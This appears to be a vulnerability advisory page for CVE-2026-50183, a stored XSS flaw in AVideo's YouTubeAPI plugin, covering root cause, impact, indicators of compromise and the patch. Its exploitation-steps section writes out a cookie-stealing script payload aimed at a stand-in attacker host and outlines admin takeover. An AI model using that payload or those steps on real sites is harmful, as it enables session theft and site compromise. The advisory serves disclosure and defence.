CVE-2026-50183
PHP Análise e mitigação de vulnerabilidades

Visão geral

CVE-2026-50183 is a stored Cross-Site Scripting (XSS) vulnerability in the AVideo YouTubeAPI plugin (WWBN/AVideo) that allows any YouTube video uploader to inject malicious JavaScript into the AVideo homepage gallery by setting a hostile video title. The vulnerability affects AVideo versions ≤ 29.0 and was published on May 28, 2026, with the GitHub Advisory Database entry updated on June 4, 2026. It carries a CVSS v3.1 base score of 4.7 (Moderate) (GitHub Advisory).

Detalhes técnicos

The root cause is CWE-79 (Stored XSS) chained with CWE-829 (Inclusion of Functionality from Untrusted Control Sphere): plugin/YouTubeAPI/YouTubeAPI.php::listVideos() fetches the snippet.title field from the YouTube Data API and stores it in a YPTvideoObject without sanitization, treating uploader-controlled content as trusted. plugin/YouTubeAPI/gallerySection.php then reflects the title into four HTML contexts in each gallery card — three with no encoding whatsoever, and one with only a partial str_replace('"', '', $youtubeTitle) mitigation that strips double quotes from a single attribute but leaves the other three sinks unprotected. The most dangerous sink (line 60) renders the title directly into the DOM as a live <script> element, causing synchronous JavaScript execution. AVideo's response caching (default cacheTimeout of 3600 seconds) means the malicious payload persists even after the hostile video title is changed or removed on YouTube (GitHub Advisory, AVideo Security Advisory).

Impacto

Every visitor who loads any AVideo page rendering the YouTubeAPI gallery section is affected: the injected JavaScript executes in the visitor's browser session under the AVideo origin, enabling theft of non-HttpOnly cookies and issuance of authenticated requests on behalf of the victim. When the victim is an AVideo administrator, the payload can perform any admin action available via cookie-based authentication — including creating users, escalating privileges, modifying configuration, or installing plugins — effectively enabling full administrative takeover of the AVideo instance. The payload's persistence through the cache window (up to one hour by default) means it continues to affect users even after the malicious YouTube video is removed (GitHub Advisory).

Etapas de exploração

  1. Reconnaissance: Identify AVideo instances with the YouTubeAPI plugin enabled and showGallerySection=true (both are defaults after a YouTube Data API key is configured). Enumerate the operator's configured keyword/search query by observing the gallery content on the AVideo homepage.
  2. Create hostile YouTube video: Using any free YouTube account, upload a video and set its title to a JavaScript payload, e.g., <script>document.location='https://attacker.example/steal?c='+document.cookie</script>.
  3. Arrange query match: Ensure the hostile video appears in the AVideo operator's configured YouTube search results by including the operator's keyword phrase in the video's title, description, or by targeting a channel the operator follows.
  4. Wait for cache expiry: Wait up to 3600 seconds (default cacheTimeout) for AVideo's cached YouTube response to expire and a fresh listVideos() call to fetch the malicious title.
  5. Payload delivery: When any visitor (or administrator) loads the AVideo homepage or any page rendering the gallery section, the unencoded title is injected into the DOM as a live <script> element and executes synchronously in the victim's browser.
  6. Achieve objective: Collect stolen session cookies for account takeover, or — if the victim is an admin — issue authenticated admin API requests to create a backdoor account or install a malicious plugin (AVideo Security Advisory).

Indicadores de compromisso

  • Network: Outbound requests from visitor browsers to unexpected external domains (e.g., attacker-controlled cookie-harvesting endpoints) originating from AVideo gallery page loads; unusual JavaScript-initiated POST requests to AVideo admin endpoints from non-admin user sessions.
  • Logs: AVideo web server access logs showing repeated requests to the homepage or gallery-rendering pages from diverse IPs shortly after a new YouTube video matching the configured query was indexed; YouTube Data API cache refresh events (listVideos() calls) coinciding with introduction of a new video with anomalous title characters (<, >, script).
  • File System: Unexpected new admin accounts or configuration changes in the AVideo database following gallery page loads; modified plugin files if an attacker leveraged admin takeover to install a malicious plugin.
  • Process/Application: AVideo cache files (stored for cacheTimeout seconds) containing raw HTML/JavaScript in the snippet.title field of cached YouTube API responses (AVideo Security Advisory).

Mitigação e soluções alternativas

The fix was committed to the WWBN/AVideo repository (commit 7292129) and applies htmlspecialchars($video->title, ENT_QUOTES | ENT_HTML5, 'UTF-8') and equivalent encoding to the thumbnail URL before rendering in gallerySection.php, neutralizing all four injection sinks. As of the advisory publication, no patched release version was formally tagged (affected versions listed as ≤ 29.0 with "Patched versions: None" in the advisory), so operators should update to the latest master branch commit or apply the patch manually. As an interim workaround, disable the YouTubeAPI plugin or set showGallerySection=false in the plugin configuration, and manually flush the AVideo YouTube response cache to remove any already-cached malicious titles (AVideo Patch Commit, GitHub Advisory).

Reações da comunidade

The vulnerability was reported by security researcher arkmarta and published by AVideo maintainer DanielnetoDotCom via GitHub's coordinated disclosure process on May 28, 2026. No significant broader media coverage or notable social media commentary beyond the GitHub advisory and GitLab advisory mirror has been identified (GitHub Advisory).

Recursos adicionais


OrigemEste relatório foi gerado usando IA

Relacionado PHP Vulnerabilidades:

CVE ID

Gravidade

Pontuação

Tecnologias

Nome do componente

Exploração do CISA KEV

Tem correção

Data de publicação

CVE-2026-54458CRITICAL9.6
  • PHP logoPHP
  • wwbn/avideo
NãoNãoJul 15, 2026
CVE-2026-49279HIGH7.7
  • PHP logoPHP
  • wwbn/avideo
NãoNãoJul 15, 2026
GHSA-xg43-5579-qw6vMEDIUM6.5
  • PHP logoPHP
  • adawolfa/isdoc
NãoSimJul 15, 2026
CVE-2026-50182MEDIUM6.1
  • PHP logoPHP
  • wwbn/avideo
NãoNãoJul 15, 2026
CVE-2026-50183MEDIUM4.7
  • PHP logoPHP
  • wwbn/avideo
NãoNãoJul 15, 2026

Avaliação de vulnerabilidade gratuita

Compare sua postura de segurança na nuvem

Avalie suas práticas de segurança na nuvem em 9 domínios de segurança para comparar seu nível de risco e identificar lacunas em suas defesas.

Solicitar avaliação

Marque uma demonstração personalizada

Pronto para ver a Wiz em ação?

"A melhor experiência do usuário que eu já vi, fornece visibilidade total para cargas de trabalho na nuvem."
David EstlickCISO
"A Wiz fornece um único painel de vidro para ver o que está acontecendo em nossos ambientes de nuvem."
Adão FletcherDiretor de Segurança
"Sabemos que se a Wiz identifica algo como crítico, na verdade é."
Greg PoniatowskiChefe de Gerenciamento de Ameaças e Vulnerabilidades